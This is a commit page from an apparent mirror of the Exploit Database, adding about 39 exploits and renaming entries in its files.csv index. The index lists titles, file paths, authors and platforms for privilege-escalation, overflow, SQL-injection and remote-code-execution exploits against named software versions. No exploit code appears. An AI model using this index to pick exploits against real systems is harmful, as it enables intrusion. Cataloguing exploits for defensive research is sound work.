bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-01-31

Browse source 
39 new exploits

OpenSSL 1.1.0 - Remote Client Denial of Service

CDRTools CDRecord 2.0 - Mandrake Privilege Escalation
CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation

RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit
RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation
BitchX 1.0c19 - Privilege Escalation (suid?)
Apache 1.3.31 (mod_include) - Local Buffer Overflow
BitchX 1.0c19 - Privilege Escalation
Apache 1.3.31 mod_include - Local Buffer Overflow

AIX 4.3/5.1 < 5.3 - lsmcode Command Execution Privilege Escalation
AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation

Debian 2.2 - /usr/bin/pileup Privilege Escalation
Debian 2.2 /usr/bin/pileup - Privilege Escalation

Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation

GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow

Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow

IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation
IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation

IBM AIX 5.3.0 - setlocale() Privilege Escalation
IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation

FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit
FreeBSD 6x/7 protosw Kernel - Privilege Escalation

PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit

HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow

(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation
(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation

Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)
Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)

FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit
FreeBSD 6.4 - Netgraph Privilege Escalation

PHP 5.4.3 (Windows x86 Polish) - Code Execution

Apache (Mod_Auth_OpenID) - Session Stealing
Apache Mod_Auth_OpenID - Session Stealing

cPanel 5.0 - Openwebmail Privilege Escalation
cPanel 5.0 - 'Openwebmail' Privilege Escalation
Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)
Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)
Apache 2.0.4x mod_php - File Descriptor Leakage (1)
Apache 2.0.4x mod_php - File Descriptor Leakage (2)

Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)
Apache 2.0.4x mod_perl - File Descriptor Leakage (3)

cPanel 5-9 - Privilege Escalation
cPanel 5 < 9 - Privilege Escalation

Apache 1.3.x (mod_include) - Local Buffer Overflow
Apache 1.3.x mod_include - Local Buffer Overflow

IBM AIX 5.x - Diag Privilege Escalation Vulnerabilities
IBM AIX 5.x - 'Diag' Privilege Escalation

Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation
Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation

Amanda 3.3.1 - amstar Command Injection Privilege Escalation
Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)
Deepin Linux 15 - lastore-daemon Privilege Escalation
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)
Deepin Linux 15 - 'lastore-daemon' Privilege Escalation

Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)

Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)
Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)

Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)

Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation

Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)

Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)
Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)

Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)

MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition

MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation

Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)

Apache CouchDB 2.0.0 - Local Privilege Escalation
Apache CouchDB 2.0.0 - Privilege Escalation

Vesta Control Panel 0.9.8-16 - Local Privilege Escalation
Vesta Control Panel 0.9.8-16 - Privilege Escalation

Systemd 228 - Privilege Escalation (PoC)
Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Privilege Escalation (PoC)

Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)

Apache 1.3.x (mod_mylo) - Remote Code Execution
Apache 1.3.x mod_mylo - Remote Code Execution

Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure

Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit

Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit

Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow
Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow

3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow

Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow
Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow

Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)
Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit

3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)

SapLPD 6.28 (Windows x86) - Remote Buffer Overflow

Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow

Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow
Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow

Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow

Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting
Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting

Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit
Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit

Apache (mod_proxy) - Reverse Proxy Exposure (PoC)
Apache mod_proxy - Reverse Proxy Exposure (PoC)

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit

Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting
Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting

Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass
Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass

Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass
Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass

Apache (mod_wsgi) - Information Disclosure
Apache mod_wsgi - Information Disclosure

Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit
Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution

phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit
phpGraphy 0.9.12 - Privilege Escalation / Commands Execution

PEAR 1.9.0 - Multiple Remote File Inclusion
PHP PEAR 1.9.0 - Multiple Remote File Inclusion

Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload
PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload

Radisys MRF - Command Injection
PHP PEAR 1.10.1 - Arbitrary File Download
Caregiver Script 2.57 - SQL Injection
Auction Script 6.49 - SQL Injection
Itech B2B Script 4.28 - SQL Injection
Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection
Itech Dating Script 3.26 - SQL Injection
Itech Freelancer Script 5.13 - SQL Injection
Itech Multi Vendor Script 6.49 - SQL Injection
Itech News Portal Script 6.28 - SQL Injection
Itech Real Estate Script 3.12 - SQL Injection
PHP Product Designer Script - Arbitrary File Upload
PHP Logo Designer Script - Arbitrary File Upload
Video Sharing Script 4.94 - SQL Injection
HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download
Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection
Itech Dating Script 3.26 - 'send_gift.php' SQL Injection
Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-01-31 05:01:15 +00:00
parent 6df10a3616
commit bf6526a40b
41 changed files with 1323 additions and 70 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

158
files.csv
View file

@ -5348,13 +5348,14 @@ id,file,description,date,author,platform,type,port
41163,platforms/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",multiple,dos,0
41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0
21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0
29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0
31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 - Mandrake Privilege Escalation",2003-05-14,anonymous,linux,local,0
31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0
32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0
40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0
52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
@ -5395,7 +5396,7 @@ id,file,description,date,author,platform,type,port
200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0
202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0
203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit",2000-11-29,Tlabs,linux,local,0
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation",2000-11-29,Tlabs,linux,local,0
206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0
207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0
209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0
@ -5484,8 +5485,8 @@ id,file,description,date,author,platform,type,port
559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0
560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0
579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0
586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation (suid?)",2004-10-20,Sha0,linux,local,0
587,platforms/linux/local/587.c,"Apache 1.3.31 (mod_include) - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation",2004-10-20,Sha0,linux,local,0
587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0
600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0
601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0
@ -5500,7 +5501,7 @@ id,file,description,date,author,platform,type,port
695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0
698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",ultrix,local,0
699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,aix,local,0
701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - lsmcode Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0
701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0
713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0
714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
@ -5596,7 +5597,7 @@ id,file,description,date,author,platform,type,port
1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Privilege Escalation",2005-08-16,"Charles Stevenson",linux,local,0
1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0
1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 - Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,windows,local,0
1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0
1170,platforms/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup - Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0
1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,windows,local,0
1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,windows,local,0
1181,platforms/linux/local/1181.c,"MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (1)",2004-12-24,"Marco Ivaldi",linux,local,0
@ -5770,7 +5771,7 @@ id,file,description,date,author,platform,type,port
3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0
3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0
3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0
3451,platforms/windows/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",windows,local,0
3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",win_x86,local,0
3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0
3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
@ -5812,9 +5813,9 @@ id,file,description,date,author,platform,type,port
3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow",2007-04-27,Marsu,windows,local,0
3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0
3856,platforms/windows/local/3856.htm,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local,0
3888,platforms/windows/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0
3888,platforms/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",win_x86,local,0
3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0
3912,platforms/windows/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,windows,local,0
3912,platforms/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,win_x86,local,0
3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0
3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0
4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)",2007-05-28,n00b,windows,local,0
@ -5834,7 +5835,7 @@ id,file,description,date,author,platform,type,port
4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0
4233,platforms/aix/local/4233.c,"IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
4233,platforms/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0
4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0
4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0
@ -5866,7 +5867,7 @@ id,file,description,date,author,platform,type,port
4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local,0
4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - setlocale() Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local,0
4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0
4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
@ -5958,7 +5959,7 @@ id,file,description,date,author,platform,type,port
7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0
7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0
7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0
7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0
7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow",2008-12-29,His0k4,windows,local,0
7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0
@ -6111,7 +6112,7 @@ id,file,description,date,author,platform,type,port
8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local,0
8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0
8799,platforms/windows/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,windows,local,0
8799,platforms/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,win_x86,local,0
8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0
8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0
8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Privilege Escalation",2009-06-04,"NT Internals",windows,local,0
@ -6346,7 +6347,7 @@ id,file,description,date,author,platform,type,port
11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0
11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0
11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0
11112,platforms/win_x86/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",win_x86,local,0
11139,platforms/windows/local/11139.c,"Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0
11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
@ -6422,7 +6423,7 @@ id,file,description,date,author,platform,type,port
12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0
12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0
12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0
12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
@ -6694,7 +6695,7 @@ id,file,description,date,author,platform,type,port
16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
@ -6771,7 +6772,7 @@ id,file,description,date,author,platform,type,port
16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,local,0
16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation",2011-03-08,XenoMuta,windows,local,0
16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0
16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit",2011-03-10,zx2c4,bsd,local,0
16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Privilege Escalation",2011-03-10,zx2c4,bsd,local,0
16965,platforms/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow",2011-03-12,"C4SS!0 G0M3S",windows,local,0
16971,platforms/windows/local/16971.py,"ABBS Audio Media Player - '.m3u' / '.LST' Buffer Overflow",2011-03-14,Rh0,windows,local,0
